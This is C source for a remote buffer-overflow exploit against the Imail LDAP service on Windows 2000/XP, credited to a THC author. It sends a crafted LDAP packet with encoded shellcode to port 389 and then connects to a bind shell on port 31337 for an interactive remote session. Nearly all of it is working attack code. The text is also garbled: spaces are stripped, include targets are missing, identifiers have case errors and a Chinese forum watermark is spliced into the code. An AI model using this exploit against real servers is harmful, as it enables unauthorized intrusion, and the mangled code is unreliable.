/*****************************************************************************/
/*THCimail0.1-Wind0wZremoterootexploit*/
/*Exploitby:JohnnyCyberpunk([email protected])*/
/*THCPUBLICSOURCEMATERIALS*/
/**/
/*Bugwasfoundbyidefenseorsomeidefenseslaves;)*/
/*http://www.idefense.com/application/poi/display?id=74&type=vulnerabilities*/
/**/
/*compilewithMSVisualC++:clTHCimail.c*/
/**/
/*Atleastsomegreetzflyto:THC,HalvarFlake,FX,gera,MaXX,dvorak,*/
/*scut,stealth,FtRandRandom*/
/*****************************************************************************/
#include
#include
#include
#include
#pragmacomment(lib,"ws2_32.lib")
char*WIN2KEN="\xc4\x2a\x02\x75";
char*WIN2KPG="\xc4\x2a\xf9\x74";
char*WINXPSP1G="\xfe\x63\xa1\x71";
#definejumper"\xeb\X06\x4a\X43"
charldapshit[]="\x30\x82\x0a\x3d\x02\x01\x01\x60\x82\x01\x36\x02\xff\xff\xff\xff\x20";
charshellcode[]=
"\x8b\x7c\x24\xfc\x83\xc7\x21\x33\xc9\xb2\x8f\x66\x81\xc1\x02"
"\x02\x8a\x1f\x32\xda\x88\x1f\x47\xe2\xf7\x64\xac\xf5\xe6\x8d"
"\x8a\xe3\xd6\x77\x92\x13\x51\x03\x5e\xc3\xff\x5b\x8c\x7f\xa8"
"\xaf\xaf\XBF\x87\xd8\xdc\xbd\xd0\xbc\xbd\xa1\xcb\xc3\xc3\x8e"
"\x64\x8a\x67\x76\x70\x70\x70\xd2\x0c\x62\xa5\xe5\xbf\xd6\xeb"
"\x04\x8e\x04\xcf\x83\x04\xff\x93\x22\x04\xf7\x87\x02\xd0\xb3"
"\x04\x94\x8e\x74\x04\xd4\xf7\x8e\x74\x04\xc4\x93\x8e\x76\x04"
"\xdc\xab\x8e\x75\xdc\XDE\xdd\x04\xd4\xaf\x8e\x74\xbe\x46\xce"
"\xbe\x4f\x16\x04\xbb\x04\x8e\x71\x23\xbe\x4d\x5e\x6d\x0b\x4f"
"\xfa\x78\x80\x39\xca\x8a\x02\xcb\xca\x8b\xe9\xb6\x9f\xfa\x6e"
"\xe9\xbe\x9f\xd5\xd7\xd1\xd9\xdf\xdd\xa4\xc1\x9f\xce\x80\x38"
"\x83\xc5\x04\x8b\x07\x8e\x77\x80\x39\xc2\x8a\x06\xcb\x02\x57"
"\x71\xc2\x8a\xfa\x31\x71\xc2\x8b\xfb\xae\x71\xc2\xad\x02\xd2"
"\x97\xdc\x70\x5f\x06\x48\xe5\x8b\xd7\x07\xca\x8a\x0f\xca\xf8"
"\x85\x02\xd2\xfb\x0f\xe4\xa9\x9b\x66\xf7\x70\x70\x70\x06\x41"
"\xbe\x54\xdc\xdc\xdc\xdc\xd9\xc9\xd9\x70\x5f\x18\xda\xd7\xe9"
"\x06\xbf\xe5\x9f\xda\xd8\x70\xda\x5b\xc1\xd9\xd8\x70\xda\x43"
"\xdc\xda\xd8\x70\xda\x5f\x18\x02\xca\x07\xdf\x70\xda\x6b\xda"
"\xda\x70\xda\x67\x02\xcb\x8a\x83\x1b\xdc\xe7\xa1\xea\xf7\xea"
"\xe7\xd3\XEC\xe2\xeb\x1b\xbe\x5d\x02\xca\x43\x1b\xd8\xd8\xd8"
"\xdc\xdc\x71\x49\x8e\x7d\xdd\x1b\x02\xca\xf7\xdf\x02\xca\x07"
"\xdf\x3e\x87\xdc\xdc\xe5\x9f\x71\x41\xdd\xdc\xdc\xdc\xda\x70"
"\xda\x63\xe5\x70\x70\xda\x6f";
voidusage();
voidshell(intsock);
intmain(intargc,char*argv[])
{
unsignedinti,sock,sock2,addr,os,ver,rc,IMAILVER;
中國網管論壇bbs.bitsCN.com
unsignedchar*finalbuffer,*crapbuf1,*crapbuf2;
unsignedintIMAIL6_7=60;
unsignedintIMAIL_8=68;
structsockaddr_inmytcp;
structhostent*hp;
WSADATAwsaData;
printf("\nTHCimailv0.1-ImailLDAPexploit\n");
printf("testedonImail6-8\n");
printf("byJohnnyCyberpunk");
if(argc4)
usage();
ver=(unsignedshort)atoi(argv[3]);
switch(ver)
{
case0:
IMAILVER=IMAIL6_7;
break;
case1:
IMAILVER=IMAIL_8;
break;
default:
printf("\nYouenteredanillegalversion!\n\n");
usage();
Exit(-1);
}
crapbuf1=malloc(IMAILVER);
memset(crapbuf1,'X',IMAILVER);
printf("imailver=%d\n",IMAILVER);
crapbuf2=malloc(2220);
memset(crapbuf2,'X',2220);
finalbuffer=malloc(2650);
memset(finalbuffer,0,2650);
printf("\n[*]buildingbuffer\n");網管bitscn_com
strcat(finalbuffer,ldapshit);
strcat(finalbuffer,crapbuf1);
strcat(finalbuffer,jumper);
os=(unsignedshort)atoi(argv[2]);
switch(os)
{
case0:
strcat(finalbuffer,WIN2KPG);
break;
case1:
strcat(finalbuffer,WIN2KPG);
break;
case2:
strcat(finalbuffer,WINXPSP1G);
break;
default:
printf("\nYouenteredanillegalOS!\n\n");
usage();
exit(-1);
}
strcat(finalbuffer,shellcode);
strcat(finalbuffer,crapbuf2);
if(WSASTARTUP(MAKEWORD(2,1),&wsaData)!=0)
{
printf("WSAStartupfailed!\n");
exit(-1);
}
hp=gethostbyname(argv[1]);
if(!hp){
addr=inet_addr(argv[1]);
}
if((!hp)&&(addr==INADDR_NONE))
{
printf("Unabletoresolve%s\n",argv[1]);
exit(-1);
}
sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
if(!sock)
{
printf("socket()error...\n");exit(-1);
}
if(hp!=NULL)
memcpy(&(mytcp.sin_addr),hp->h_addr,hp->h_length);
else
mytcp.sin_addr.s_addr=addr;
if(hp)
mytcp.sin_family=hp->h_addrtype;
else
mytcp.sin_family=AF_INET;
mytcp.sin_port=htons(389);
printf("[*]connectingthetarget\n");
rc=connect(sock,(structsockaddr*)&mytcp,sizeof(structsockaddr_in));
if(rc==0)
{
send(sock,finalbuffer,2650,0);
printf("[*]Exploitsendsuccessfully!Sleepingawhile....\n");
Sleep(1000);
}
else
printf("\nCan'tconnecttoldapport!\n");
if(rc==0)
{
printf("[*]Tryingtogetashell\n\n");
sock2=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
mytcp.sin_port=htons(31337);
rc=connect(sock2,(structsockaddr*)&mytcp,sizeof(mytcp));
if(rc!=0)
{
printf("can'tconnecttoport31337;(maybefirewalled...\n");
exit(-1);
}
shell(sock2);
}
shutdown(sock,1);
closesocket(sock);
free(crapbuf1);
free(crapbuf2);
free(finalbuffer);
exit(0);
}
voidusage()
{
unsignedinta;
printf("\nUsage:\n");
printf("Sample:THCimail194.44.55.5601\n\n");
printf("OS:\n");
printf("0-Windows2000Serverenglishallservicepacks\n");
printf("1-Windows2000Professionalgerman\n");
printf("2-WindowsXPSP1german\n\n");
printf("ImailVersion:\n");
printf("0-Imail6+7\n");
printf("1-Imail8\n");
exit(0);
}
voidshell(intsock)
{
intl;
charbuf[1024];
structtimevaltime;
unsignedlongul[2];
time.tv_sec=1;
time.tv_usec=0;
while(1)
{
ul[0]=1;
ul[1]=sock;
l=select(0,(fd_set*)&ul,NULL,NULL,&time);if(l==1)
{
l=recv(sock,buf,sizeof(buf),0);
if(l<=0)
{
printf("byebye...\n");
return;
}
l=write(1,buf,l);
if(l<=0)
{
printf("byebye...\n");
return;
}
}
else
{
l=read(0,buf,sizeof(buf));
if(l<=0)
{
printf("byebye...\n");
return;
}
l=send(sock,buf,l,0);
if(l<=0)
{
printf("byebye...\n");
return;
}
}
}
}